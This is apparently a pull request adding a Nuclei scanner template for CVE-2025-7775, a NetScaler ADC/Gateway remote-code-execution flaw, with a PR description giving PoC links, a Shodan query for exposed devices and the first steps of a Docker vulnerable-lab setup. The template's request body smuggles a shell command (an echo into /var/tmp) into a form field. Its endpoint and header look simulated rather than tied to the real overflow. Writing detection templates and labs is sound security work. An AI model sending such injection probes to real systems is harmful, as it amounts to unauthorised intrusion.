### PR TITLE
Add CVE-2025-7775 template, vulnerable lab, Dockerfile, README, and s…

### DIFF
--- a/http/cves/2025/CVE-2025-7775.yaml
+++ b/http/cves/2025/CVE-2025-7775.yaml
@@ -1,0 +1,50 @@
+---
+id: CVE-2025-7775
+
+info:
+  name: NetScaler ADC / Gateway - Buffer Overflow RCE (Simulated PoC)
+  author: Aaqilyousuf
+  severity: critical
+  description: |
+    NetScaler ADC and NetScaler Gateway 13.1, 14.1, 13.1-FIPS, and NDcPP
+    contain a buffer overflow vulnerability in Gateway and LB virtual servers
+    bound with IPv6 services. This template is a simulated PoC that shows how
+    remote attackers might exploit the flaw for RCE.
+  impact: |
+    Successful exploitation could allow attackers to execute arbitrary
+    commands or cause denial of service.
+  remediation: |
+    Apply the vendor patch or upgrade to the latest secure version of
+    NetScaler ADC / Gateway.
+  classification:
+    cve-id: CVE-2025-7775
+    cwe-id: CWE-120
+    cvss-metrics: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+    cvss-score: 9.8
+  tags: cve,cve2025,netscaler,adc,gateway,rce,kev
+
+http:
+  - method: POST
+    path:
+      - "{{BaseURL}}/api/v1/configuration"
+    headers:
+      User-Agent: "Citrix-NetScaler-IntScanner/1.0"
+      Content-Type: "application/x-www-form-urlencoded"
+      X-NSCP-API: "simulated_rce_vector"
+    body: |
+      'api_key=simulated_preauth&command=;echo "POC_SUCCESS_nuclei" >' +
+      ' /var/tmp/poc_test.txt;'
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        part: body
+        words:
+          - "POC_SUCCESS"
+    extractors:
+      - type: regex
+        part: body
+        regex:
+          - "POC_SUCCESS[^\\s<]+"


### PR DESCRIPTION
## CVE-2025-7775 Vulnerable Lab & Nuclei Template

### Template / PR Information

- Added CVE-2025-7775 Nuclei template for NetScaler ADC / Gateway Buffer Overflow RCE (Simulated PoC)
- References / PoC:
  - https://github.com/hacker-r3volv3r/CVE-2025-7775-PoC
  - https://github.com/mezo0x4/CVE-2025-7775
  - https://github.com/mezo0x4/CVE-2025-7775-PoC
- KEV: True
- Shodan Query: `http.favicon.hash:-1292923998,-1166125415`

### Template Validation

I've validated this template locally:
- [x] YES
- [ ] NO

---

/claim #13025

### Vulnerable Lab / Test Setup

This PR also includes a **Docker-based vulnerable environment** for testing the template.
The lab is available here: [CVE-2025-7775 Vulnerable Lab](https://github.com/Aaqilyousuf/CVE-2025-7775-vulnerable-lab)

1. Clone the lab repository:

```bash
git clone https://github.com/Aaqilyousuf/CVE-2025-7775-vulnerable-lab.git
cd CVE-2025-7775-vulnerable-lab
